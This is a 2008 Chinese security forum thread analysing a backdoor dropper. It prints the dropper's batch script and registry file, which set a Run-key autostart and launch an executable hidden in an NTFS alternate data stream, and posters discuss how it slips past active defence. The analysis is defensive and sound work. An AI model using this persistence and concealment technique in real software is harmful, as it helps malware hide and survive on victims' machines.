1   1  /  1  页   跳转

特别的鸽子(转自卡饭)

特别的鸽子(转自卡饭)

动作目标:C:\PROGRAM FILES\COMMON FILES\INSTALLSHIELD\PROFESSIONAL
动作:创建C:\PROGRAM FILES\COMMON FILES\INSTALLSHIELD\PROFESSIONAL

不懂创建这个能干什么~~


---------------------------
错误
---------------------------
"C:\Program Files\Common Files\InstallShield\Professional\RunTime"
文件夹无法访问
---------------------------
确定 
---------------------------


 附件: 您所在的用户组无法下载或查看附件

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)

附件附件:

您所在的用户组无法下载或查看附件

最后编辑wjzdw 最后编辑于 2008-06-23 19:51:51
一见钟情,再而衰,三而竭。
分享到:
gototop
 

回复:特别的鸽子(转自卡饭)

转卡饭哪的?给出原帖链接。鸽子的定性谁下的?
既不是Delphi所写,输入表更没有任何操作服务的API,怎么可能是鸽子呢?说它释放鸽子我还信,说它本身是鸽子就太没道理了。
病毒样本请发到可疑文件交流区
gototop
 

回复:特别的鸽子(转自卡饭)

瑞星杀毒软件版本20.50.02
Backdoor.Gpigeon.urw  RunTime.exe>>1.txt:5.exe
gototop
 

回复: 特别的鸽子(转自卡饭)

实际上RunTime.exe本身的可执行文件部分根本不是鸽子,正如我上面所说。
鸽子来自于它的附加数据部分。附加数据从文件偏移0x2F4000开始,为一个带有自解压命令的RAR文件。
将此RAR文件拿出来,用WINRAR打开,如图:

 附件: 您所在的用户组无法下载或查看附件
由自解压脚本,自解压时运行的是1.bat,1.bat内容:

cd %ProgramFiles%\Common Files\InstallShield\Professional\RunTime\
regedit /s 1.orz
start .\1.txt:5.exe


使用regedit导入1.orz。1.orz是一个UNICODE字符集的.reg文件,内容:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Cleaner"="\"C:\\Program Files\\Common Files\\InstallShield\\Professional\\RunTime\\1.bat\""


即写入启动项。
然后运行1.txt附带的ADS流文件5.exe,这个5.exe才是鸽子。
而且这种方法的前提是,系统盘应为NTFS格式。
病毒样本请发到可疑文件交流区
gototop
 

回复: 特别的鸽子(转自卡饭)



引用:
原帖由 轩辕小聪 于 2008-6-23 20:40:00 发表
转卡饭哪的?给出原帖链接。鸽子的定性谁下的?
既不是Delphi所写,输入表更没有任何操作服务的API,怎么可能是鸽子呢?说它释放鸽子我还信,说它本身是鸽子就太没道理了。



没说它是鸽子饿    但这家伙能过  微为啥不能显示点  估计也能过瑞星的主防

楼上的老兄不是发上来让你杀的    是让你研究如何改进主动防御的



数据流      .........


那个病毒文件好奇特  显示0kB大小

如果中了这种木马    不晓得SRENG能不能扫出来
最后编辑wjzdw 最后编辑于 2008-06-24 19:42:48
一见钟情,再而衰,三而竭。
gototop
 

回复:特别的鸽子(转自卡饭)

还有问一下  昨天电脑不知怎么 用QQ时输进密码老提示错误

得用软键盘输    TM也一样  把QQ卸载了重装也不行

最后重装系统才能解决  请问有可能是什么情况?

(运行上面那家伙后发现的  不过应该没关系吧...)
一见钟情,再而衰,三而竭。
gototop
 

回复 6F wjzdw 的帖子

汗!
对付这DD,方法很多。
能过主防就牛B吗?

 附件: 您所在的用户组无法下载或查看附件

附件附件:

您所在的用户组无法下载或查看附件

最后编辑baohe 最后编辑于 2008-06-26 09:41:58
gototop
 

回复: 特别的鸽子(转自卡饭)



引用:
原帖由 baohe 于 2008-6-26 9:40:00 发表
汗!
对付这dd,方法很多。
能过主防就牛b吗?

 附件: 您所在的用户组无法下载或查看附件


没说牛逼饿~~


权限不足  受限用户运行的?  组策略?
最后编辑wjzdw 最后编辑于 2008-06-26 23:03:38
一见钟情,再而衰,三而竭。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT